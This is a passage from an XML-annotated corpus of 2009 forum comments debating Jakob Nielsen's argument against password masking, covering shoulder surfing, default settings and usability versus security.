I absolutely donot see the point as all I end up doing is copy pasting the first version .</tokentext>
<sentencetext>Let's please also abolish stupid websites asking for my e-mail address twice (plainly visible in both cases) to "confirm" it.
I absolutely donot see the point as all I end up doing is copy pasting the first version.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472331</id>
	<title>So this would probably be a bad time...</title>
	<author>Anonymous</author>
	<datestamp>1245924300000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>So this would probably be a bad time to suggest to Mr. Nielsen that what's really needed is stronger authentication.  Computer security breaches of the last few years increasingly convince me the security community should more widely deploy techniques like smart cards (or other means of protecting a private key from casual intercept or replication.)  Biometrics may also play a role, but there are lots of issues there to first be addressed.</p></htmltext>
<tokenext>So this would probably be a bad time to suggest to Mr. Nielsen that what 's really needed is stronger authentication .
Computer security breaches of the last few years increasingly convince me the security community should more widely deploy techniques like smart cards ( or other means of protecting a private key from casual intercept or replication .
) Biometrics may also play a role , but there are lots of issues there to first be addressed .</tokentext>
<sentencetext>So this would probably be a bad time to suggest to Mr. Nielsen that what's really needed is stronger authentication.
Computer security breaches of the last few years increasingly convince me the security community should more widely deploy techniques like smart cards (or other means of protecting a private key from casual intercept or replication.
)  Biometrics may also play a role, but there are lots of issues there to first be addressed.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</id>
	<title>Masking passwords doesn't do much</title>
	<author>delirium of disorder</author>
	<datestamp>1245920400000</datestamp>
	<modclass>Redundant</modclass>
	<modscore>1</modscore>
	<htmltext><p>If someone can shouldersurf, 99\% of the time they have physical access and all security is null.  If they can see your ***ed password on the screen, than they can see your fingers type they characters of your password on the keyboard (again with 1\% exceptions like keyboard covers and remote displays).  If a malicious person can see your screen, than they are probably close enough that that can tap your cables, install hardware keyloggers, sniff your EMF, cold boot your RAM and grep it, do audio analysis of your typing and decipher your keystrokes, and etc.</p><p>***ing your passwords protects against a very small hole....the situation where someone is allowed to see your screen but is searched to make sure they have no monitoring equipment, has the keyboard kept out of site, and isn't allowed to touch anything.</p></htmltext>
<tokenext>If someone can shouldersurf , 99 \ % of the time they have physical access and all security is null .
If they can see your * * * ed password on the screen , than they can see your fingers type they characters of your password on the keyboard ( again with 1 \ % exceptions like keyboard covers and remote displays ) .
If a malicious person can see your screen , than they are probably close enough that that can tap your cables , install hardware keyloggers , sniff your EMF , cold boot your RAM and grep it , do audio analysis of your typing and decipher your keystrokes , and etc .
* * * ing your passwords protects against a very small hole....the situation where someone is allowed to see your screen but is searched to make sure they have no monitoring equipment , has the keyboard kept out of site , and is n't allowed to touch anything .</tokentext>
<sentencetext>If someone can shouldersurf, 99\% of the time they have physical access and all security is null.
If they can see your ***ed password on the screen, than they can see your fingers type they characters of your password on the keyboard (again with 1\% exceptions like keyboard covers and remote displays).
If a malicious person can see your screen, than they are probably close enough that that can tap your cables, install hardware keyloggers, sniff your EMF, cold boot your RAM and grep it, do audio analysis of your typing and decipher your keystrokes, and etc.
***ing your passwords protects against a very small hole....the situation where someone is allowed to see your screen but is searched to make sure they have no monitoring equipment, has the keyboard kept out of site, and isn't allowed to touch anything.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471971</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>Anonymous</author>
	<datestamp>1245923160000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>There are plenty of instances where you are able to view the display and still don't/can't "own" the box. Mall/Airport kiosks, LAN gaming centers, inner city libraries etc.</p><p>COD4 doesn't mask passwords for server entry. We went to a LAN gaming center for a friend's bachelor party and wound up with a  bunch of shoulder surfing kids jumping into our game. None of us were very good, and they had played to a point where their characters were of a much higher level than our n00bs. Needless to say what started as a fun game exclusively amongst friends turned into total decimation at the hands of 'tween savants. None of us even knew you could call helocopters. Learned real quick though. We became so frustrated that we simply left.</p><p>Usability for a single feature should never trump the entire user experience. Typing in the password incorrectly a couple times is a small price to pay when the alternative is a total degredation of my game play experience. Same goes for any other type of software as well.</p></htmltext>
<tokenext>There are plenty of instances where you are able to view the display and still do n't/ca n't " own " the box .
Mall/Airport kiosks , LAN gaming centers , inner city libraries etc.COD4 does n't mask passwords for server entry .
We went to a LAN gaming center for a friend 's bachelor party and wound up with a bunch of shoulder surfing kids jumping into our game .
None of us were very good , and they had played to a point where their characters were of a much higher level than our n00bs .
Needless to say what started as a fun game exclusively amongst friends turned into total decimation at the hands of 'tween savants .
None of us even knew you could call helocopters .
Learned real quick though .
We became so frustrated that we simply left.Usability for a single feature should never trump the entire user experience .
Typing in the password incorrectly a couple times is a small price to pay when the alternative is a total degredation of my game play experience .
Same goes for any other type of software as well .</tokentext>
<sentencetext>There are plenty of instances where you are able to view the display and still don't/can't "own" the box.
Mall/Airport kiosks, LAN gaming centers, inner city libraries etc.COD4 doesn't mask passwords for server entry.
We went to a LAN gaming center for a friend's bachelor party and wound up with a  bunch of shoulder surfing kids jumping into our game.
None of us were very good, and they had played to a point where their characters were of a much higher level than our n00bs.
Needless to say what started as a fun game exclusively amongst friends turned into total decimation at the hands of 'tween savants.
None of us even knew you could call helocopters.
Learned real quick though.
We became so frustrated that we simply left.Usability for a single feature should never trump the entire user experience.
Typing in the password incorrectly a couple times is a small price to pay when the alternative is a total degredation of my game play experience.
Same goes for any other type of software as well.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471455</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>Angostura</author>
	<datestamp>1245921600000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>My 5 year old daughter tries to shoulder surf my password. She hasn't installed a keylogger <i>yet</i> to my knowledge.</p></htmltext>
<tokenext>My 5 year old daughter tries to shoulder surf my password .
She has n't installed a keylogger yet to my knowledge .</tokentext>
<sentencetext>My 5 year old daughter tries to shoulder surf my password.
She hasn't installed a keylogger yet to my knowledge.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471841</id>
	<title>The many ways in which Jacob Nielsen is teh fail</title>
	<author>jonaskoelker</author>
	<datestamp>1245922860000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>I think Jacob Nielsen is both right, slightly wrong, and not so slightly wrong.</p><p>First, the personal anecdote.  There's one place and time where I really want to look at my password.  That's when I'm installing a new OS.</p><p>I'm typically alone in my room when I'm doing that.  Or I'm doing it for a friend who trusts me (and I could install a back door if I had one anyways).  I use the Dvorak keyboard layout, but my point works equally well just for just about any layout except the US bog standard.  The trick is: I'm not used to using the installation software.  I don't know whether it has really picked up on my keyboard layout---in debian/ubuntu installers, the password is among the first things I type.  I would \_really\_ like to (at my discretion) have the password displayed.</p><p>Next, let's consider what Nielsen is saying.</p><p><div class="quote"><p>Providing feedback and visualizing the system's status have always been among the most basic usability principles.</p></div><p>True.</p><p><div class="quote"><p>Of course, a truly skilled criminal can simply look at the keyboard and note which keys are being pressed. So, password masking doesn't even protect fully against snoopers.</p></div><p>I tried that against a sales representative today, twice.  Didn't work.  But I'm not truly skilled.  If the password had been on the screen, I'm sure it had been a lot easier.</p><p>It's not like masking passwords buys you <em>nothing</em>.  It does buy you something.  If he has evidence that the value doesn't exceed its cost, I'd like to see it.</p><p>But maybe masking <em>rarely</em> buys you anything?</p><p><div class="quote"><p>[Usually] It's just you, sitting all alone in your office, suffering reduced usability to protect against a non-issue.</p></div><p>Could be true, but that actually makes unmasking a problem.  I'll get to that.</p><p><div class="quote"><p>Yes, users are sometimes truly at risk of having bystanders spy on their passwords, such as when they're using an Internet cafe. It's therefore worth offering them a checkbox to have their passwords masked; for high-risk applications, such as bank accounts, you might even check this box by default.</p></div><p>As we all know, the expected utility of any uncertain event is its probability times its utility.</p><p>Nielsen does address security compromises with a large (negative) utility, such as bank account passwords.  He fails at considering the probability.</p><p>Why is that crucial?</p><p>The probability of compromise can be largely influenced by use <em>context</em>.  That is, am I sitting alone in my cubicle?  Am I giving a presentation using a projector?  Am I using a public kiosk?</p><p>I don't know about you guys, but when I look at any login screen I'm used to using, I type my username and password without asking myself "is my security at risk?".  When I'm using a projector, I'm reflecting over the fact that other people can't see my password <em>while I'm typing it</em>.</p><p>Said another way: the correct system for logging in changes from</p><ul><li>Type username and password</li></ul><p>To</p><ul><li>Assess the situational risks</li><li>Type username and password</li></ul><p>I think the second habit is much harder to form, and takes more thought.  Most users will fail.  He points out that loss of security is a danger with masked passwords.  With unmasked passwords, it's a certainty.  We need fail-safe, because failures an inevitable.  If one of your employees accidentally forgets to check the checkbox at a trade show, your competitor can now log in as that employee and steal your trade secrets.</p><p>Dan Ariely gave a great TED talk about how we go with defaults if the options are complicated: <a href="http://www.ted.com/talks/lang/eng/dan\_ariely\_asks\_are\_we\_in\_control\_of\_our\_own\_decisions.html" title="ted.com">http://www.ted.com/talks/lang/eng/dan\_ariely\_asks\_are\_we\_in\_control\_of\_our\_own\_decisions.html</a> [ted.com]</p><p>We need a fail-safe default.</p><p>On the other hand, don't listen to me.  Listen to the evidence.  Note how I don't have any, and Jacob doesn't have any.  I think that's the biggest failure.  Sure, well-controlled studies of his hypothesis are hard to do, so other evidence will have to make do.</p><p>But he doesn't have any.</p></div>
	</htmltext>
<tokenext>I think Jacob Nielsen is both right , slightly wrong , and not so slightly wrong.First , the personal anecdote .
There 's one place and time where I really want to look at my password .
That 's when I 'm installing a new OS.I 'm typically alone in my room when I 'm doing that .
Or I 'm doing it for a friend who trusts me ( and I could install a back door if I had one anyways ) .
I use the Dvorak keyboard layout , but my point works equally well just for just about any layout except the US bog standard .
The trick is : I 'm not used to using the installation software .
I do n't know whether it has really picked up on my keyboard layout---in debian/ubuntu installers , the password is among the first things I type .
I would \ _really \ _ like to ( at my discretion ) have the password displayed.Next , let 's consider what Nielsen is saying.Providing feedback and visualizing the system 's status have always been among the most basic usability principles.True.Of course , a truly skilled criminal can simply look at the keyboard and note which keys are being pressed .
So , password masking does n't even protect fully against snoopers.I tried that against a sales representative today , twice .
Did n't work .
But I 'm not truly skilled .
If the password had been on the screen , I 'm sure it had been a lot easier.It 's not like masking passwords buys you nothing .
It does buy you something .
If he has evidence that the value does n't exceed its cost , I 'd like to see it.But maybe masking rarely buys you anything ?
[ Usually ] It 's just you , sitting all alone in your office , suffering reduced usability to protect against a non-issue.Could be true , but that actually makes unmasking a problem .
I 'll get to that.Yes , users are sometimes truly at risk of having bystanders spy on their passwords , such as when they 're using an Internet cafe .
It 's therefore worth offering them a checkbox to have their passwords masked ; for high-risk applications , such as bank accounts , you might even check this box by default.As we all know , the expected utility of any uncertain event is its probability times its utility.Nielsen does address security compromises with a large ( negative ) utility , such as bank account passwords .
He fails at considering the probability.Why is that crucial ? The probability of compromise can be largely influenced by use context .
That is , am I sitting alone in my cubicle ?
Am I giving a presentation using a projector ?
Am I using a public kiosk ? I do n't know about you guys , but when I look at any login screen I 'm used to using , I type my username and password without asking myself " is my security at risk ? " .
When I 'm using a projector , I 'm reflecting over the fact that other people ca n't see my password while I 'm typing it.Said another way : the correct system for logging in changes fromType username and passwordToAssess the situational risksType username and passwordI think the second habit is much harder to form , and takes more thought .
Most users will fail .
He points out that loss of security is a danger with masked passwords .
With unmasked passwords , it 's a certainty .
We need fail-safe , because failures an inevitable .
If one of your employees accidentally forgets to check the checkbox at a trade show , your competitor can now log in as that employee and steal your trade secrets.Dan Ariely gave a great TED talk about how we go with defaults if the options are complicated : http : //www.ted.com/talks/lang/eng/dan \ _ariely \ _asks \ _are \ _we \ _in \ _control \ _of \ _our \ _own \ _decisions.html [ ted.com ] We need a fail-safe default.On the other hand , do n't listen to me .
Listen to the evidence .
Note how I do n't have any , and Jacob does n't have any .
I think that 's the biggest failure .
Sure , well-controlled studies of his hypothesis are hard to do , so other evidence will have to make do.But he does n't have any .</tokentext>
<sentencetext>I think Jacob Nielsen is both right, slightly wrong, and not so slightly wrong.First, the personal anecdote.
There's one place and time where I really want to look at my password.
That's when I'm installing a new OS.I'm typically alone in my room when I'm doing that.
Or I'm doing it for a friend who trusts me (and I could install a back door if I had one anyways).
I use the Dvorak keyboard layout, but my point works equally well just for just about any layout except the US bog standard.
The trick is: I'm not used to using the installation software.
I don't know whether it has really picked up on my keyboard layout---in debian/ubuntu installers, the password is among the first things I type.
I would \_really\_ like to (at my discretion) have the password displayed.Next, let's consider what Nielsen is saying.Providing feedback and visualizing the system's status have always been among the most basic usability principles.True.Of course, a truly skilled criminal can simply look at the keyboard and note which keys are being pressed.
So, password masking doesn't even protect fully against snoopers.I tried that against a sales representative today, twice.
Didn't work.
But I'm not truly skilled.
If the password had been on the screen, I'm sure it had been a lot easier.It's not like masking passwords buys you nothing.
It does buy you something.
If he has evidence that the value doesn't exceed its cost, I'd like to see it.But maybe masking rarely buys you anything?
[Usually] It's just you, sitting all alone in your office, suffering reduced usability to protect against a non-issue.Could be true, but that actually makes unmasking a problem.
I'll get to that.Yes, users are sometimes truly at risk of having bystanders spy on their passwords, such as when they're using an Internet cafe.
It's therefore worth offering them a checkbox to have their passwords masked; for high-risk applications, such as bank accounts, you might even check this box by default.As we all know, the expected utility of any uncertain event is its probability times its utility.Nielsen does address security compromises with a large (negative) utility, such as bank account passwords.
He fails at considering the probability.Why is that crucial?The probability of compromise can be largely influenced by use context.
That is, am I sitting alone in my cubicle?
Am I giving a presentation using a projector?
Am I using a public kiosk?I don't know about you guys, but when I look at any login screen I'm used to using, I type my username and password without asking myself "is my security at risk?".
When I'm using a projector, I'm reflecting over the fact that other people can't see my password while I'm typing it.Said another way: the correct system for logging in changes fromType username and passwordToAssess the situational risksType username and passwordI think the second habit is much harder to form, and takes more thought.
Most users will fail.
He points out that loss of security is a danger with masked passwords.
With unmasked passwords, it's a certainty.
We need fail-safe, because failures an inevitable.
If one of your employees accidentally forgets to check the checkbox at a trade show, your competitor can now log in as that employee and steal your trade secrets.Dan Ariely gave a great TED talk about how we go with defaults if the options are complicated: http://www.ted.com/talks/lang/eng/dan\_ariely\_asks\_are\_we\_in\_control\_of\_our\_own\_decisions.html [ted.com]We need a fail-safe default.On the other hand, don't listen to me.
Listen to the evidence.
Note how I don't have any, and Jacob doesn't have any.
I think that's the biggest failure.
Sure, well-controlled studies of his hypothesis are hard to do, so other evidence will have to make do.But he doesn't have any.
	</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478797</id>
	<title>Learnability is usability too</title>
	<author>dg5</author>
	<datestamp>1246049520000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Kudos to Jakob for his legacy of work, but sometimes he just points out problems and does not suggest solutions. Sure passwords are a necessary evil in this day and age, and obscuring them will make it arguably more difficult for users to not make a mistake. But I guess that's the point really - security requires focus and unless you suffer from something like ADHD you should be able to focus on what you're typing for 5 or 10 seconds.</p><p>Besides, usability covers learnability of the interface, and I don't think it's very hard to understand that dots, exes, whatever represents the letters that you type and warns you that you should be careful when you type this thing in.</p><p>I think it's a great idiom - it stresses importance and calls for focus and vigilance - which is exactly what you want when you're dealing with sensitive information.</p><p>So until fingerprint readers or retinal scanners are the main means of authentication, obscured passwords are one of the more successful ways to marry usability and security.</p></htmltext>
<tokenext>Kudos to Jakob for his legacy of work , but sometimes he just points out problems and does not suggest solutions .
Sure passwords are a necessary evil in this day and age , and obscuring them will make it arguably more difficult for users to not make a mistake .
But I guess that 's the point really - security requires focus and unless you suffer from something like ADHD you should be able to focus on what you 're typing for 5 or 10 seconds.Besides , usability covers learnability of the interface , and I do n't think it 's very hard to understand that dots , exes , whatever represents the letters that you type and warns you that you should be careful when you type this thing in.I think it 's a great idiom - it stresses importance and calls for focus and vigilance - which is exactly what you want when you 're dealing with sensitive information.So until fingerprint readers or retinal scanners are the main means of authentication , obscured passwords are one of the more successful ways to marry usability and security .</tokentext>
<sentencetext>Kudos to Jakob for his legacy of work, but sometimes he just points out problems and does not suggest solutions.
Sure passwords are a necessary evil in this day and age, and obscuring them will make it arguably more difficult for users to not make a mistake.
But I guess that's the point really - security requires focus and unless you suffer from something like ADHD you should be able to focus on what you're typing for 5 or 10 seconds.Besides, usability covers learnability of the interface, and I don't think it's very hard to understand that dots, exes, whatever represents the letters that you type and warns you that you should be careful when you type this thing in.I think it's a great idiom - it stresses importance and calls for focus and vigilance - which is exactly what you want when you're dealing with sensitive information.So until fingerprint readers or retinal scanners are the main means of authentication, obscured passwords are one of the more successful ways to marry usability and security.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476157</id>
	<title>Re:hunter2</title>
	<author>Anonymous</author>
	<datestamp>1245941340000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p><div class="quote"><p>If Stephen Hawking says something about physics, do you require a citation from him?</p></div><p>Of fucking course you do! Do you know nothing about science?</p></div>
	</htmltext>
<tokenext>If Stephen Hawking says something about physics , do you require a citation from him ? Of fucking course you do !
Do you know nothing about science ?</tokentext>
<sentencetext>If Stephen Hawking says something about physics, do you require a citation from him?Of fucking course you do!
Do you know nothing about science?
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477937</id>
	<title>Re:Not to fanboi all over the place...</title>
	<author>ewanm89</author>
	<datestamp>1245955560000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>All mobile/cell phones I've used in the past 5 years have done this, and none made by apple.</htmltext>
<tokenext>All mobile/cell phones I 've used in the past 5 years have done this , and none made by apple .</tokentext>
<sentencetext>All mobile/cell phones I've used in the past 5 years have done this, and none made by apple.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470909</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471397</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>gujo-odori</author>
	<datestamp>1245921420000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>You might be , le to shoulder surf someone's password in a public place, or even at their desk, but that doesn't mean all physical security is gone. Unlike shoulder surfing, which is relatively easy to do without being noticed/caught, those other things all require far more intrusive/obvious steps such as: physically touching the computer, and putting something on it, placing audio equipment near the computer, or removing the RAM from the computer. Good luck on not being caught doing that.</p><p>Moreover, even if you could somehow do some or all of those things without being caught, they require a far higher level of expertise than does shoulder surfing. Even picking up  the password by watching keystrokes is harder than getting it by shoulder surfing if it appears on the screen; there aren't very many people who could watch me type most of my passwords and have any decent clue what they were, unless they watched me type them a lot.</p><p>Another point which you choose to ignore is that password shoulder surfing would most easily be done in a public place, which implies a notebook computer rather than a desktop. That takes tapping cables out of play (there aren't any, usually), as well as hardware keyloggers (even if you could open the notebook and put it back together without being caught, installing the keylogger would be a lot harder or impossible). Good luck with the audio analysis over the background noise, too.</p><p>Yes, masking passwords isn't necessary under most circumstances, but that doesn't mean it isn't necessary, because in some circumstances you definitely want it. The furthest in that direction that any login screen should go is to have a check box for "Show my password as I type" and that box should be unchecked by default.</p><p>I, for one, would not use any site that showed my password in clear text as I typed and did not allow me to mask it. Despite the fact that my passwords are usually long and complex, I rarely mistype them and on those occasions when I do, it's not a big deal to re-type.</p><p>The argument that the author of TFA is making - and that he tricked you into going along with - is that because this security feature is superfluous in some (perhaps most) circumstances, we should therefore do away with it entirely, even though it is very valuable in some circumstances, AKA "It's imperfect, therefore it must be destroyed." As the saying goes, the perfect is the enemy of the good. Of course, he also fails to promote a more perfect solution to shoulder surfing, so his position is basically "Good isn't good enough, junk it. Better to have nothing."</p></htmltext>
<tokenext>You might be , le to shoulder surf someone 's password in a public place , or even at their desk , but that does n't mean all physical security is gone .
Unlike shoulder surfing , which is relatively easy to do without being noticed/caught , those other things all require far more intrusive/obvious steps such as : physically touching the computer , and putting something on it , placing audio equipment near the computer , or removing the RAM from the computer .
Good luck on not being caught doing that.Moreover , even if you could somehow do some or all of those things without being caught , they require a far higher level of expertise than does shoulder surfing .
Even picking up the password by watching keystrokes is harder than getting it by shoulder surfing if it appears on the screen ; there are n't very many people who could watch me type most of my passwords and have any decent clue what they were , unless they watched me type them a lot.Another point which you choose to ignore is that password shoulder surfing would most easily be done in a public place , which implies a notebook computer rather than a desktop .
That takes tapping cables out of play ( there are n't any , usually ) , as well as hardware keyloggers ( even if you could open the notebook and put it back together without being caught , installing the keylogger would be a lot harder or impossible ) .
Good luck with the audio analysis over the background noise , too.Yes , masking passwords is n't necessary under most circumstances , but that does n't mean it is n't necessary , because in some circumstances you definitely want it .
The furthest in that direction that any login screen should go is to have a check box for " Show my password as I type " and that box should be unchecked by default.I , for one , would not use any site that showed my password in clear text as I typed and did not allow me to mask it .
Despite the fact that my passwords are usually long and complex , I rarely mistype them and on those occasions when I do , it 's not a big deal to re-type.The argument that the author of TFA is making - and that he tricked you into going along with - is that because this security feature is superfluous in some ( perhaps most ) circumstances , we should therefore do away with it entirely , even though it is very valuable in some circumstances , AKA " It 's imperfect , therefore it must be destroyed .
" As the saying goes , the perfect is the enemy of the good .
Of course , he also fails to promote a more perfect solution to shoulder surfing , so his position is basically " Good is n't good enough , junk it .
Better to have nothing .
"</tokentext>
<sentencetext>You might be , le to shoulder surf someone's password in a public place, or even at their desk, but that doesn't mean all physical security is gone.
Unlike shoulder surfing, which is relatively easy to do without being noticed/caught, those other things all require far more intrusive/obvious steps such as: physically touching the computer, and putting something on it, placing audio equipment near the computer, or removing the RAM from the computer.
Good luck on not being caught doing that.Moreover, even if you could somehow do some or all of those things without being caught, they require a far higher level of expertise than does shoulder surfing.
Even picking up  the password by watching keystrokes is harder than getting it by shoulder surfing if it appears on the screen; there aren't very many people who could watch me type most of my passwords and have any decent clue what they were, unless they watched me type them a lot.Another point which you choose to ignore is that password shoulder surfing would most easily be done in a public place, which implies a notebook computer rather than a desktop.
That takes tapping cables out of play (there aren't any, usually), as well as hardware keyloggers (even if you could open the notebook and put it back together without being caught, installing the keylogger would be a lot harder or impossible).
Good luck with the audio analysis over the background noise, too.Yes, masking passwords isn't necessary under most circumstances, but that doesn't mean it isn't necessary, because in some circumstances you definitely want it.
The furthest in that direction that any login screen should go is to have a check box for "Show my password as I type" and that box should be unchecked by default.I, for one, would not use any site that showed my password in clear text as I typed and did not allow me to mask it.
Despite the fact that my passwords are usually long and complex, I rarely mistype them and on those occasions when I do, it's not a big deal to re-type.The argument that the author of TFA is making - and that he tricked you into going along with - is that because this security feature is superfluous in some (perhaps most) circumstances, we should therefore do away with it entirely, even though it is very valuable in some circumstances, AKA "It's imperfect, therefore it must be destroyed.
" As the saying goes, the perfect is the enemy of the good.
Of course, he also fails to promote a more perfect solution to shoulder surfing, so his position is basically "Good isn't good enough, junk it.
Better to have nothing.
"</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472235</id>
	<title>I bet all of his passwords are blank</title>
	<author>inject\_hotmail.com</author>
	<datestamp>1245924000000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I bet all of his passwords are blank, so it doesn't matter to him.<p>
If people have so much difficulty entering their passwords, they should fix themselves, not the computers they are using.  I've been entering passwords for 20 years, and masking doesn't bother me in the slightest.  Actually, I prefer Linux style...like another poster said: "No mask is a good mask"...except null.</p></htmltext>
<tokenext>I bet all of his passwords are blank , so it does n't matter to him .
If people have so much difficulty entering their passwords , they should fix themselves , not the computers they are using .
I 've been entering passwords for 20 years , and masking does n't bother me in the slightest .
Actually , I prefer Linux style...like another poster said : " No mask is a good mask " ...except null .</tokentext>
<sentencetext>I bet all of his passwords are blank, so it doesn't matter to him.
If people have so much difficulty entering their passwords, they should fix themselves, not the computers they are using.
I've been entering passwords for 20 years, and masking doesn't bother me in the slightest.
Actually, I prefer Linux style...like another poster said: "No mask is a good mask"...except null.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471347</id>
	<title>Re:Two words</title>
	<author>ucblockhead</author>
	<datestamp>1245921240000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Actually, no.  It's more like saying that there's no point in locking your car if it is in your garage.</p><p>Shoulder surfing implies public setting.  In a private setting, password masking does not help security at all and hinders usability.</p></htmltext>
<tokenext>Actually , no .
It 's more like saying that there 's no point in locking your car if it is in your garage.Shoulder surfing implies public setting .
In a private setting , password masking does not help security at all and hinders usability .</tokentext>
<sentencetext>Actually, no.
It's more like saying that there's no point in locking your car if it is in your garage.Shoulder surfing implies public setting.
In a private setting, password masking does not help security at all and hinders usability.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473295</id>
	<title>Re:Security</title>
	<author>PitaBred</author>
	<datestamp>1245927960000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext>See, now you're asking people to make critical decisions affecting their own security, with the vast majority of them having no way to realistically evaluate the actual security. You're intentionally calling forth the demons of being <a href="http://www.damninteresting.com/?p=406" title="damninteresting.com">Unskilled and Unaware of It</a> [damninteresting.com]. People will overestimate their security on their shitware ridden Windows machines, or check their bank accounts from home and work and the library... if the preferences are per-user, that's horribly insecure. If it's per user+IP, it will confuse normal users and anger them. It's better to leave it as secure as possible from any possible login point. You shouldn't ever underestimate the stupidity of the average person, especially when it's a subject they don't care about.</htmltext>
<tokenext>See , now you 're asking people to make critical decisions affecting their own security , with the vast majority of them having no way to realistically evaluate the actual security .
You 're intentionally calling forth the demons of being Unskilled and Unaware of It [ damninteresting.com ] .
People will overestimate their security on their shitware ridden Windows machines , or check their bank accounts from home and work and the library... if the preferences are per-user , that 's horribly insecure .
If it 's per user + IP , it will confuse normal users and anger them .
It 's better to leave it as secure as possible from any possible login point .
You should n't ever underestimate the stupidity of the average person , especially when it 's a subject they do n't care about .</tokentext>
<sentencetext>See, now you're asking people to make critical decisions affecting their own security, with the vast majority of them having no way to realistically evaluate the actual security.
You're intentionally calling forth the demons of being Unskilled and Unaware of It [damninteresting.com].
People will overestimate their security on their shitware ridden Windows machines, or check their bank accounts from home and work and the library... if the preferences are per-user, that's horribly insecure.
If it's per user+IP, it will confuse normal users and anger them.
It's better to leave it as secure as possible from any possible login point.
You shouldn't ever underestimate the stupidity of the average person, especially when it's a subject they don't care about.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471093</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472539</id>
	<title>Re:Security</title>
	<author>darpo</author>
	<datestamp>1245925020000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Your "den"? What are you, a wolf?</htmltext>
<tokenext>Your " den " ?
What are you , a wolf ?</tokentext>
<sentencetext>Your "den"?
What are you, a wolf?</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471093</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472685</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>Anonymous</author>
	<datestamp>1245925560000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>There is a significant difference between seeing a password in a text field on a screen, and trying to follow someone's usually rapid typing.</p><p>Your other arguments support the conclusion that doors shouldn't have locks, since a lockless door is equally effective against all scenarios other than a small subset.</p><p>captcha: bullets!</p></htmltext>
<tokenext>There is a significant difference between seeing a password in a text field on a screen , and trying to follow someone 's usually rapid typing.Your other arguments support the conclusion that doors should n't have locks , since a lockless door is equally effective against all scenarios other than a small subset.captcha : bullets !</tokentext>
<sentencetext>There is a significant difference between seeing a password in a text field on a screen, and trying to follow someone's usually rapid typing.Your other arguments support the conclusion that doors shouldn't have locks, since a lockless door is equally effective against all scenarios other than a small subset.captcha: bullets!</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471091</id>
	<title>Get rid of passwords..</title>
	<author>Anonymous</author>
	<datestamp>1245920520000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Why not get rid of the concept of passwords? Isn't public key-cryptography perfectly designed to do so?</htmltext>
<tokenext>Why not get rid of the concept of passwords ?
Is n't public key-cryptography perfectly designed to do so ?</tokentext>
<sentencetext>Why not get rid of the concept of passwords?
Isn't public key-cryptography perfectly designed to do so?</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28507569</id>
	<title>Re:Two more words for Nielsen: Security Cameras</title>
	<author>Anonymous</author>
